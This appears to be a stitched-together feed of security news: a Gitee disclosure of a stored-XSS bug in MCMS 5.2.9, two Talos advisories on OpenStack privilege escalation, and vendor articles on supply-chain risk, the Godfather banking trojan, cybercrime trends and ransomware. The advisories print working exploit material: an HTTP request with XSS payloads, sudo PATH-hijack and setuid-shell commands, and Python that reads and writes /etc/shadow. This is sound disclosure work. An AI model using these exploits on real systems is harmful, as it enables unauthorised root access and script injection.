A vulnerability has been found in Mingsoft MCMS 5.2.9 and classified as problematic. Affected by this vulnerability is the function save of the component Article Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216499.

**漏洞详情**

在保存或者更新文章的时候，没有对提交数据做严格的过滤。生成文章时，在前台照成xss攻击。

    net.mingsoft.cms.action#save()
    

    net.mingsoft.cms.action#update()
    

在net.mingsoft.cms.entity包下面都是类似JavaBean的写法，set()直接设置，get()获取返回直接返回，没有过滤。

构造payload

可以看到这几个字段都没经过有限过滤。

  
生成poc

生成时，会把上面payload直接输出到前台html。

可以看到其中 标题、描述、内容，直接输出到前台HTML。

可以看到contentTitle、contentDescription、contentDetails 三个构造的payload触发。

    POST /ms/cms/content/save.do HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Cache-Control: no-cache
    Pragma: no-cache
    token: null
    Content-Length: 491
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/ms/cms/content/form.do
    Cookie: Phpstorm-f6f062b4=5f525093-5f84-4757-8d57-73a0807e485f; currentMenuCode=1599107821860655104; pageNo=2; pageSize=20; pageno_cookie=1; SHIRO_SESSION_ID=58a8d37d-8a16-430e-a7ef-925839f673e0; rememberMe=5cjEDUiKQ6EcshxFJv6JNis4+TagGWtfYnhBYTSNM7EP5KDqO2/eXptuk3yigpRYnLtx+I12zn8n+Gst9nIatcPOzKhtmhXsRFeVEZkhMnKk6/hwmvK6bikR3zS59ckqOCyxze4jmESJ8Kh8h50p1w9CchOCxhcH17GpRz29vlPFvdT1iKZHMHncxuhfDCfBj5mQOpwSHtGotKOJoQ+EJdnmcRvkdDRkP/woZ+xvAZTixkRHW1HWn3/nIjapKo5G5EmXeuN+1YmauoeMX9NXg1n4Q3XONqwS3EJC1PMqdLWIOxBjt9vEGC9OnsiUHlZDZnFwxFs9A0gELQUO0qy0/cudGdDamjgFTa4bLCQvJ0GjHCaigPj+PvQ2qPc+dfXuUzC9sYK9E1tv8QtsrEQXjuNoHsc7a0OMvTPSfKYntICLzNfhI8oDF6dZLuW/4pRUYTD9N650hVA/Aa9oDrLMCj10m52kTPrQ0u3yU6VsOSr4vY1D/Zkj7VsHfnN8teAwC0V0CzyDC+PJfIuccESmNSkI/7mtVNV9P45dY8eJZTP+GgAEOLcZB73BYRujlD50iqaeMxUJXQPOZkpE8rCrxZpKS+1sjgti9gbRYdbdiF4b78GNyzOZShCGMIdt06uuDcL4pGIq6iBSVk2v0hf65nbIFhl7Wfn3hZeg6/ETfTqUCYq8vW0TLK6WO7njF/083lb4Pz39Bx2Dejdx5IfQt5oLyxSoqLrDaB87Fuq+96yZz3Iw+VITpahW2UBinDGF25R85PbqKY8SacCQzqQaqHz4zKkPLtIvMEVYld7bMVL+vLU5FB7Da5Ti9ce+XAkUK6nEsWYpJq3ONi5+nzI1ZSIWfEuumIK6xGQ6qpyjPSo732xSfHT+1fpAhs+yTGlFpTk+iht43qK5upi2jcAZcxqy3mFjjbLXVAng7Bp0QbRH+aD+su8H/UEGiOEJ9b6in2zCN/caz6YNmNpjb1ubG3VBOYanpERZEaRuL/5Sl294YE6mBUPfn+CN0xjzJWCiC0KqBI1DCxb6D0u2mLdsXaCbhCv02VyVL3IlHScbE50MXz/ioisb0ccLTNzafP41YjO5bDz1laIsvTw1keROjcltAexzgQxnC42tozLKzedLygLClhuxqvzHMGTnQg5J5nvmYWT96gc7uuEJnyQl4/62RY0bnQ/nj7b81nHxxZQeAUSico2GKeQjJGSTPNWMh++h8sdImqVvbE2ARhkgXsyOIQrmGTN8Tk+g2yVPG947S37PGdUCb2lfzRBV1UQipiNJ1HuSTbfSzNRY5Nfrer0xaI78+Mc5j7xoSswg1r5jsO/zFdL/66U+DO5Q8jsQTn8zjapBYK+nEa0=
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    contentTitle=<svg/onload=console.log('xss1')>&categoryId=1329257757913718785&contentType=<svg/onload=console.log('xss2')>&contentDisplay=0&contentAuthor=<svg/onload=console.log('xss3')>&contentSource=<svg/onload=console.log('xss4')>&contentSort=0&contentImg="><svg/onload%3dconsole.log('xss5')>"<&contentDescription=<svg/onload=console.log('xss6')>&contentKeyword=<svg/onload=console.log('xss7')>&contentDetails=<svg/onload=console.log('xss8')>&contentDatetime=2022-12-08%2005%3A19%3A37&id=0

CVE-2022-4640: v5.2.9 前台存储xss · Issue #I65KI5 · 铭飞/MCMS - Gitee.com

Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities.

The security industry collectively loses its mind when new vulnerabilities are discovered in software. OpenSSL is no exception, and two new vulnerabilities overwhelmed news feeds in late October and early November 2022. Discovery and disclosure are only the beginnings of this never-ending vulnerability cycle. Affected organizations are faced with remediation, which is especially painful for those on the front lines of IT. Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities, recognize impacts to supply chains, and secure their assets accordingly.

**Supply Chain Attacks Aren't Going Away**

In roughly a year's time, we've suffered through severe vulnerabilities in componentry including Log4j, Spring Framework, and OpenSSL. Exploitation of older vulnerabilities also never ceases from implementations that are misconfigured or that use known vulnerable dependencies. In November 2022, the public learned of an attack campaign against the Federal Civilian Executive Branch (FCEB), attributable to a state-sponsored Iranian threat. This US federal entity was running VMware Horizon infrastructure that contained the Log4Shell vulnerability, which served as the initial attack vector. FCEB was hit with a complex attack chain that included lateral movement, credential compromise, system compromise, network persistence, endpoint protection bypass, and cryptojacking.

Organizations may ask "why consume OSS at all?" after security incidents from vulnerable packages like OpenSSL or Log4j. Supply chain attacks continue trending upward because componentry reuse makes “good business sense” for partners and suppliers. We engineer systems by repurposing existing code rather than building from scratch. This is to reduce engineering effort, scale operationally, and deliver quickly. Open source software (OSS) is generally considered trustworthy by virtue of the public scrutiny it receives. However, software is ever-changing, and issues arise through coding mistakes or linked dependencies. New issues are also uncovered through evolution of testing and exploitation techniques.

**Tackling Supply Chain Vulnerabilities**

Organizations need appropriate tooling and process to secure modern designs. Traditional approaches such as vulnerability management or point-in-time assessments alone can't keep up. Regulations may still allow for these approaches, which perpetuates the divide between "secure" and "compliant." Most organizations aspire to obtain some level of DevOps maturity. "Continuous" and "automated" are common traits of DevOps practices. Security processes shouldn't differ. Security leaders must maintain focus throughout build, delivery, and runtime phases as part of their security strategy:

*   **Continuously scan in CI/CD:** Aim to secure build pipelines (i.e., shift-left) but acknowledge that you won't be able to scan all code and nested code. Success with shift-left approaches is limited by scanner efficacy, correlation of scanner output, automation of release decisions, and scanner completion within release windows. Tooling should help prioritize risk of findings. Not all findings are actionable, and vulnerabilities may not be exploitable in your architecture.

*   **Continuously scan during delivery:** Component compromise and environment drift happen. Applications, infrastructure, and workloads should be scanned while being delivered in case something was compromised in the digital supply chain when being sourced from registries or repositories and bootstrapped.

*   **Continuously scan in runtime:** Runtime security is the starting point of many security programs, and security monitoring underpins most cybersecurity efforts. You need mechanisms that can collect and correlate telemetry in all types of environments, though, including cloud, container, and Kubernetes environments. Insights gathered in runtime should feed back to earlier build and delivery stages. Identity and service interactions

*   **Prioritize vulnerabilities exposed in runtime:** All organizations struggle with having enough time and resources to scan and fix everything. Risk-based prioritization is fundamental to security program work. Internet exposure is just one factor. Another is vulnerability severity, and organizations often focus on high and critical severity issues since they're deemed to have the most impact. This approach can still waste cycles of engineering and security teams because they may be chasing vulnerabilities that never get loaded at runtime and that aren't exploitable. Use runtime intelligence to verify what packages actually get loaded in running applications and infrastructure to know the actual security risk to your organization.

We've created product-specific guidance to steer customers through the recent OpenSSL madness.

The latest OpenSSL vulnerability and Log4Shell remind us of the need for cybersecurity preparedness and effective security strategy. We must remember that CVE-IDs are just those known issues in public software or hardware. Many vulnerabilities go unreported, particularly weaknesses in homegrown code or environmental misconfigurations. Your cybersecurity strategy must account for distributed and diverse technology of modern designs. You need a modernized vulnerability management program that uses runtime insights to prioritize remediation work for engineering teams. You also need threat detection and response capabilities that correlate signals across environments to avoid surprises.

**About the Author**

    

Michael Isbitski, Director of Cybersecurity Strategy at Sysdig, has researched and advised on cybersecurity for over five years. He's versed in cloud security, container security, Kubernetes security, API security, security testing, mobile security, application protection, and secure continuous delivery. He's guided countless organizations globally in their security initiatives and supporting their business.

Prior to his research and advisory experience, Mike learned many hard lessons on the front lines of IT with over 20 years of practitioner and leadership experience focused on application security, vulnerability management, enterprise architecture, and systems engineering.

Supply Chain Risks Got You Down? Keep Calm and Get Strategic!

Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.

Google has announced Trend Micro will be joining their App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store. Trend Micro will be pre-scanning apps utilizing our Mobile App Reputation Service (MARS). We’re proud to be asked to support this alliance and join the other members who are part of this program which supports Trend Micro’s mission to make the World safe for exchanging digital information.

MARS, was initially developed and launched in 2012. protects our mobile customers by supporting a reputation service that checks any apps on their mobile devices. This uses a process whereby a query is sent by the customer to MARS, which then responds with a detection of whether the app is good, bad, or unknown. If unknown, we utilize threat intelligence to quickly make a determination. MARS received over 47 billion queries in 2021, resulting in 37 million malicious app detections. As of September 2022, MARS has received over 36 billion queries and made 27 million detections.

Trend Micro mobile researchers are regularly publishing articles and reports on mobile threats to help people better understand what this threat landscape looks like. Trend Micro will continue to invest in our research and development both in human capital and technology like artificial intelligence and machine learning to improve the mobile ecosystem. As one of the largest pure cybersecurity vendors in the world, this investment and focus allow us to protect both our partners like Google and our customers from cyber threats targeting them.

As more and more consumers rely on their mobile devices and the apps installed for everyday work and play, this partnership will ensure they are protected from malicious actors around the world. Trend Micro looks forward to a long partnership with Google.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Trend Micro Joins Google’s App Defense Alliance

The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.

A type of Android malware that's been targeting banking users worldwide since March has resurfaced with advanced obfuscation methods, masquerading as a legitimate application on the Google Play store with more than 10 million downloads, researchers have found.

Godfather is a banking Trojan that is best known for targeting banking users in European countries, but its latest activity shows an increased sophistication in its ability to fly under the radar of common malware-detection methods, researchers from Cyble Research & Intelligence Labs (CRIL) said in a blog post on Dec. 20.

Once it's successfully installed on a victim's device, Godfather initiates a series of typical banking Trojan behaviors, including stealing banking and crypto-exchange credentials, the researchers said. But it also steals sensitive data such as SMSs, basic device details — including data from installed applications — and the device's phone number, and it can perform a number of nefarious actions silently in the background.

"Apart from these, it can also control the device screen using VNC \[virtual network computing\], forwarding incoming calls of the victim's device and injecting banking URLs," the Cyble researchers wrote.

The latest sample of Godfather that researchers discovered was encrypted using custom encryption techniques that could evade detection by common antivirus products — a new tactic of the threat actors behind the malware, the researchers said.

**Targeting Businesses & Consumers**

Upon further examination, the researchers found that the malware was using an icon and name similar to the legitimate Google Play app MYT Music, which already has logged more than 10 million downloads. Indeed, threat actors often hide malware on Google Play, despite Google's best efforts in the last several years to keep bad apps off its store before users are affected by it.

MYT Music was written in the Turkish language and thus researchers assume the Godfather sample they discovered is targeting Android users in Turkey. However, they suspect other versions of the malware continue to be active and targeting banking users worldwide.

Though banking Trojans tend to affect consumers more than the enterprise, business users are still at risk because they use their mobile devices at work and may even have business apps and data stored on their devices. For this reason, enterprise users should be especially wary of downloading apps from the Internet or opening any links received via SMS or emails delivered to a mobile phone, the researchers said.

Google Play has removed the app, but those with it installed are still at risk.

**How Godfather Pulls Victims' Strings**

Once it's installed on an Android device, Godfather requests 23 different permissions from the device, abusing a number of them to gain access to a user's contacts and the state of the device, as well as information related to the user account. It also can write or delete files in external storage and disable the keylock and any associated password security, the Cyble researchers said.

Godfather can successfully do money transfers from a hacked device through its ability to initiate phone calls through Unstructured Supplementary Service Data (USSD) that don't require use of the dialer user interface, and thus don't need the user to confirm the call, they said.

The malware also extracts sensitive user data from the device — including application key logs — that can be sent back to a command-and-control (C2) server, which also sends Godfather a command that forwards any incoming calls the victim receives to a number provided by the threat actor, the researchers said.

Godfather then harvests credentials: It creates an overlay window in the OnAccessibilityEvent method and injects HTML phishing pages via a separate command from C2, the server URL of which is from a Telegram channel, hxxps://t\[.\]me/varezotukomirza, the researchers said.

Once it completes its malicious activity, Godfather receives a "killbot" command from C2 to self-terminate, they added.

**Avoiding Being Whacked by Godfather**

The most common way to avoid downloading mobile app malware is to download and install software only from official app stores such as Google Play or Apple, the conventional wisdom goes.

However, as this instance proves, malware can lurk in official app stores too, so "practicing basic cyber-hygiene across mobile devices and online banking applications effectively prevents such malware from compromising your devices," the researchers noted in the post, including using a reputable antivirus and Internet security software package on connected devices to ensure anything downloaded is free from malware.

Also, advanced anti-detection methods like the ones the threat actors behind Godfather are using can make even downloading what look like legitimate apps tricky, they said. To further protect themselves, users can utilize strong passwords and enforce multifactor authentication on devices wherever possible, making it more difficult for threat actors to crack into their accounts. 

Android device users also should ensure that Google Play Protect is enabled on their devices for further security protection, the Cyble researchers added.

All mobile device users also should enable biometric security features such as fingerprint or facial recognition for unlocking the mobile device and using apps, where possible, and be especially careful when enabling permissions on devices, especially if an app has not been verified by a reputable provider, they added.

Godfather Banking Trojan Masquerades as Legitimate Google Play App

More zero knowledge attacks, more leaked credentials, more Gen-Z cyber crimes - 2022 trends and 2023 predictions.
Cybercrime remains a major threat to individuals, businesses, and governments around the world. Cybercriminals continue to take advantage of the prevalence of digital devices and the internet to perpetrate their crimes. As the internet of things continues to develop, cybercriminals

More zero knowledge attacks, more leaked credentials, more Gen-Z cyber crimes - 2022 trends and 2023 predictions.

Cybercrime remains a major threat to individuals, businesses, and governments around the world. Cybercriminals continue to take advantage of the prevalence of digital devices and the internet to perpetrate their crimes. As the internet of things continues to develop, cybercriminals will have access to a greater number of vulnerable devices, allowing them to carry out more sophisticated attacks. Cybercrime is expected to become increasingly profitable as criminals continue to find new and better ways to monetize their attack as entry barriers to cybercrime keep going down.

This article discusses key trends we've noticed in 2022 that will likely continue in 2023, which we'll also elaborate on in the upcoming webinar "The Rise of the Rookie Hacker - a new trend to reckon with" on January 11th.

****Leaked credentials will continue to be the main attack vector for initial access****

According to IBM's cost of a breach 2022 report, use of stolen or compromised credentials remains the most common cause of a data breach.

The main source for leaked credentials in 2022 was Info-Stealers - a malware that can steal stored credentials from browsers, cookies (used for session hijacking and to bypass MFA), crypto wallets, and more. Redline Stealer, in particular, gained a lot of popularity among threat actors which led to the creation of several other stealers such as the "Luca stealer" and the "eternity stealer". The latter is part of an end-to-end offering named the eternity project, which allows threat actors to buy or rent any tool they need to launch an attack against a target of their choosing.

Stolen or compromised credentials were the primary attack vector in 19% of breaches in the 2022 study and also the top attack vector in the 2021 study. This trend is most likely to keep in its upward trajectory as a whopping 59% of organizations don't deploy zero-trust, incurring an average of 1 million USD in greater breach costs compared to those that do deploy. Until organizations' cybersecurity will mature, the volume and cost of breaches will continue to rise.

****A rise in zero-knowledge attacks****

Cybercrimes such as DDoS, malware, and ransomware are all offered as subscription services, lowering the entry barrier into cybercrime. For example, per the Microsoft Digital Defense Report 2022, phishing kits are offered on the dark web from as little as $6 and DDoS attack subscriptions for as little as $500. Ransomware-as-a-Service offered as an affiliates model is the preferred method by actors, this means "renting" an already made operation and splitting the revenue based on income and activity. The rise of "clearnet malware" - malware that can be purchased on everyday platforms like Telegram (Hello again eternity project!) helps simplify setting up a cybercrime campaign or operation. The proliferation of crypto payment platforms makes it even easier to trade in cybercrime products and services, pushing the entire cybercrime ecosystem even further.

****Younger threat actors - average age will continue to drop****

In terms of cyberattacks, 2022 was Gen Z's time to shine, leading with UK teen group Lapsus$ that went on a hacking spree targeting tech titans like Microsoft, Nvidia, Samsung, Ubisoft, and Okta. Generation Z is currently the largest generation on earth. Besides their strength in numbers, they are "digital natives", being born into a world with the internet, smartphones, cloud technologies, and social networks. Being young, they naturally crave social validation which they get in the digital sphere. Lapsus$'s main motivator was "Kudos" - they were "doing it for the lulz". The ease of launching zero-knowledge attacks, combined with Gen Z's digital nativeness and their need for social validation in the digital sphere will most likely contribute to the continuous drop in the average age of cyber criminals.

****We'll still need humans in the loop****

Enterprises invest billions of dollars deploying multi-layered security frameworks, platforms, and programs, but at the end of the day, enterprises are made of people, and people can be tricked.

Social engineering is an increasingly popular tactic used by cyberattackers to gain access to sensitive data. It involves exploiting human psychology to manipulate victims into providing confidential information or taking certain actions in order to gain access to a system or network.

LAPSUS$'s modus operandi was based on a text-book sim swapping scam. They bought credentials of the person with the right access to resources within an enterprise, called the phone provider, reporting the phone stolen, rerouted the sim to their own phone, triggered multi factor authentication on an enterprise access point (e.g. Office365 login page), and did a password reset. It was ridiculously simple and devastatingly efficient.

The best technology in the world can't completely remove the risk of human vulnerability. For that you need other humans trained in that. The cybersecurity workforce gap compelled enterprises to outsource this part of their cybersecurity to a managed detection and response (MDR) service. In fact, (according to Reportlinker.com) the global MDR market size is expected to grow from an estimated value of 2.6 billion USD in 2022 to 5.6 billion USD by 2027, at a Compound Annual Growth Rate (CAGR) of 16.0%. Technology is great, machines are great, but we still need humans.

Join Ronen Ahdut, Head of Cyber Threat Intelligence at Cynet for a webinar "The Rise of the Rookie Hacker - a new trend to reckon with" on January 11th at 10AM ET / 15:00 GMT. The webinar will deep-dive into 2023 cybersecurity trends, threats, and technology, including the need for human oversight in cybersecurity and how to detect these new threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Rise of the Rookie Hacker - A New Trend to Reckon With

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.

Several Kolla containers have a sudoers policy to allow the application to run limited commands as root, which appears to be defined here:

    Matching Defaults entries for nova on <host>:
        setenv
    
    User nova may run the following commands on <host>:
        (root) NOPASSWD: /usr/local/bin/kolla_copy_cacerts
        (root) NOPASSWD: /usr/local/bin/kolla_set_configs
        ...
    

Of note is the Defaults: %kolla setenv line in /etc/sudoers. This allows users in the kolla group to modify environment variables, and there is no secure_path option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.

Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.

The first script, kolla\_copy\_cacerts, calls out to the update-ca-certificates program, which is resolved from the PATH environment variable. This can be exploited by creating a script named “update-ca-certificates” in some writable location, and adding this location to the PATH before running sudo -E kolla_copy_cacerts.

The second script, kolla\_set\_configs, reads an environment variable for a JSON object or a path to a file containing a JSON object. This JSON specifies the source, destination, ownership and permissions for OpenStack configuration files to be copied. This can be exploited by exporting an environment variable that specifies a program to be copied with its SETUID bit set, and running kolla_set_configs with sudo -E as above.

Some containers (e.g. nova\_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.

**Exploit Proof of Concept****Method 1 (kolla_copy_cacerts)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a script payload that will be executed as root:

    $ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-ca-certificates
    $ chmod 755 /tmp/update-ca-certificates
    

Update the shell’s PATH environment variable to include the directory that the payload is in, and run the affected script with sudo:

    $ PATH=/tmp:$PATH sudo -E /usr/local/bin/kolla_copy_cacerts
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Method 2 (kolla_set_configs)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a JSON object to be parsed by the script and export it to the appropriate environment variable:

    $ export KOLLA_CONFIG='{"command":"echo test", "config_files":[{"source":"/bin/bash", "dest":"/tmp/bash", "owner":"root", "perm":"0o6755"}]}'
    

Run the affected script with sudo and then execute the copied shell:

    $ sudo -E /usr/local/bin/kolla_set_configs
    $ /tmp/bash -p
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Mitigation**

/etc/sudoers within the container should use the secure_path option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the setenv option would be removed from /etc/sudoers altogether, and env_keep could be used for any safe environment variables that do not introduce security holes.

To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.

**TIMELINE**

2022-08-11 - Vendor Disclosure  
2022-08-11 - Initial Vendor Contact  
2022-12-20 - Public Release

CVE-2022-38060: TALOS-2022-1589 || Cisco Talos Intelligence Group

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack is a cloud platform that contains a number of tools, libraries and services for providing simplified, powerful and scalable cloud-based applications.

OpenStack’s oslo.privsep library “helps applications perform actions which require more or less privileges… in a safe, easy to code and easy to use manner.” An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as nova.

The oslo.privsep design documents state the following:

    Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, 
    update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, 
    it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
    ...
    Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]
    

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The nova module contains privileged wrappers for chmod, chown and rmdir, as well as arbitrary file create/write/move/read. Second, the os\_brick module contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

    Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). 
    This is intended only as an expedient transition and should be removed ASAP.
    

Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.

**Crash Information****Method 1 (nova)**

    from nova.privsep.path import *
    from oslo_config.cfg import CONF
    CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
    # Read /etc/shadow
    last_bytes("/etc/shadow", 1000)
    # Write to /etc/shadow
    writefile("/etc/shadow", "wb", b"<payload_here>")
    # Get a root shell
    os.system("cp /bin/bash /tmp/bash")
    chown("/tmp/bash", 0)
    chmod("/tmp/bash", 0o4755)
    os.system("/tmp/bash -p")
    bash-5.1#
    

**Method 2 (os\_brick)**

    from os_brick.privileged.rootwrap import *
    from oslo_config.cfg import CONF
    import shlex # helpful for multi-arg commands
    CONF.privsep_context = 'os_brick.privileged.default'
    execute_root(*shlex.split("id"))
    ('uid=0(root) gid=0(root) groups=0(root)\n', '')
    

**Mitigation**

Privileged functions in the nova and os_brick modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. chmod(path, mode) should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.

Suggest auditing other modules that use oslo.privsep to identify similar issues.

**TIMELINE**

2022-09-07 - Vendor Disclosure  
2022-12-20 - Public Release

CVE-2022-38065: TALOS-2022-1599 || Cisco Talos Intelligence Group

Lower cybersecurity awareness coupled with vulnerable OT gear makes manufacturers tempting targets, but zero trust can blunt attackers’ advantages.

Everyone in information security knows ransomware actors target different industries for different reasons. Some are seen as flush with cash. Some have obvious reasons for needing to resume operations ASAP. Others are just widely recognized as poorly protected.

But did you know that manufacturers pay the highest ransoms of any vertical?

A recent report spelled it out in stark detail. Across all industries, the average ransom paid is a hefty $812,360. Yet for manufacturing, that average skyrockets to a stunning $2,036,189 — about two and a half times the average.

Attackers prefer easy, weak targets as a rule. So what is it about manufacturing that qualifies such organizations as easy or weak?

First, it’s worth asking whether manufacturers are targeted more often, or if they just happen to fall victim more frequently due to inherent factors like outdated tech or lack of cybersecurity awareness. The next interesting question is why they tend to shell out sums so egregiously above what organizations in other verticals do.

As a chief information security officer (CISO) with years of experience leading cybersecurity operations for a global manufacturer, I have some immediate explanations in mind. Here are some of the factors that inevitably contribute:

*   Manufacturers typically have slim profit margins and rely on steady productivity to compensate.
*   Manufacturers know they won’t make much profit on any one iteration of manufactured goods, so high volume is necessary to hit business targets over time. But high volume requires regular output, uninterrupted by slowdowns or complete outages.
*   While organizations in industries with fatter margins might be able to tolerate an extended outage, manufacturers typically can’t. The result is exceptional pressure on manufacturers to pay ransoms and pay them quickly. That’s why attackers, conscious of all this context and the leverage it gives them, may feel emboldened to charge higher ransoms than they would in other industries.

**Manufacturing Suffers From Low Cybersecurity Awareness**

Many factory workers don’t routinely use IT gear like desktop computers, laptops, or tablets. Some may not even have corporate-issued email addresses. Additionally, very few have received extensive training on current cyber threats, and as such, wouldn’t know how to recognize, react, or, report them to their IT team once they’re spotted.

Think of the most standard, low-hanging fruit of cybersecurity awareness training: the phishing simulation. Even if email addresses are provided (far from a given, especially in manufacturing facilities in the developing world), it’s simply unreasonable to expect employees to develop an understanding of the attack chain that may lead from a phishing email to a compromise by a ransomware actor.

These factors increase an organization’s total attack surface. They make the manufacturer more apparent to attackers and more likely to fall prey to attacks if they appear.

**Manufacturing Data Can Be Extraordinarily Valuable**

Imagine that a drywall manufacturer has a unique proprietary method for creating drywall that dries quickly and can be rapidly shipped on demand, yielding a competitive advantage. This type of intellectual property, once compromised, can easily be held for an exceptionally high ransom, because the entire business model would be in jeopardy if it were to leave the company.

Similar concerns can apply to data involved in market timing. Suppose a clothing manufacturer planned to release a new line in the spring based on a combination of colors its market research found would be in high demand. The company may have orchestrated its entire spring-season marketing and supply chain ordering on that basis. Attackers could hold such information for a substantial ransom, because if it were given to competitors, those competitors may get to market first with a competing product, raking in all the expected benefits.

Operational technology (OT) used by manufacturers typically involves many assets (pumps, generators, turbines, etc.) that are on the IT infrastructure — and thus accessible to attackers — yet difficult to patch or secure. Sometimes, even if an asset can be secured, only its manufacturer can secure it without voiding the asset’s warranty.

Being outdated and insecure doesn’t always make them less valuable to the organization, however. Many times, these are legacy systems are required for a basic function, with no adequate substitute available, so the organization continues using them. Attackers often take advantage in such cases to maximize their leverage in charging ransoms.

Suppose an attacker is interested in compromising a Fortune 500 bank. If that bank is a client of a manufacturer whose security is less sophisticated than the bank’s, attackers could use the manufacturer as a stepping stone.

Additionally, manufacturing organizations often simply don’t realize how many third parties (partners, clients, suppliers) can access their networks and data. They may grant network privileges too easily, and in many cases, those privileges give unrestricted access instead of being limited to just the assets required for business purposes.

**Better Security Is Available Today**

I know from experience that manufacturers can significantly reduce their attack surface by adopting zero-trust principles. In turn, this makes it less likely that attackers opportunistically probing the open Internet for weaknesses will discover the organization.

If the organization is discovered, zero trust eliminates an adversary’s ability to move laterally across a network, where they could discover the sort of valuable data that would give them leverage over their target.

Adopting a zero trust approach helps an organization to:

*   Rigorously validate the identity of all participants in a network transaction

*   Obscure from the public Internet the true IP addresses of all assets at any manufacturing facility (or combination of them) via a buffering service

*   Segment the network and support application microtunneling, limiting any possible access by attackers

*   Apply identical policies to public clouds and remote workers, with the ability to scale automatically over time as the network topology changes

These and other techniques, once implemented, can help manufacturers reduce the risk of a breach, lessen their exposure should a breach occur, and minimize the business impact of any successful attack. Best of all, they will help manufacturers hang on to more of their hard-earned profits.

Read more _Partner Perspectives_ from Zscaler

Paying Ransom: Why Manufacturers Shell Out to Cybercriminals

This unique fairytale is available for free just before Christmas to enjoy with the entire family.

**MONTPELLIER, FRANCE, December 19, 2022 /****EINPresswire.com****/ --** Bfore.Ai, an AI-driven predictive cybersecurity solutions company, recently launched the very first cybersecurity book in the market. This book, geared towards children and security specialists alike and titled The King, The Knight & The Snowball, was downloaded over 100 times within the first hour of being available. This unique seasonal tale is available now and free for anyone to download and enjoy, just in time for Christmas.

This short fairytale targets cybersecurity professionals and aims to make predictive cybersecurity an understandable and relatable topic for all ages while promoting how important it is to be security conscious in a world where there are so many threats. While the book is designed to open the understanding of cybersecurity at an early age, it’s intended as a gift to the entire technology community and all age groups.

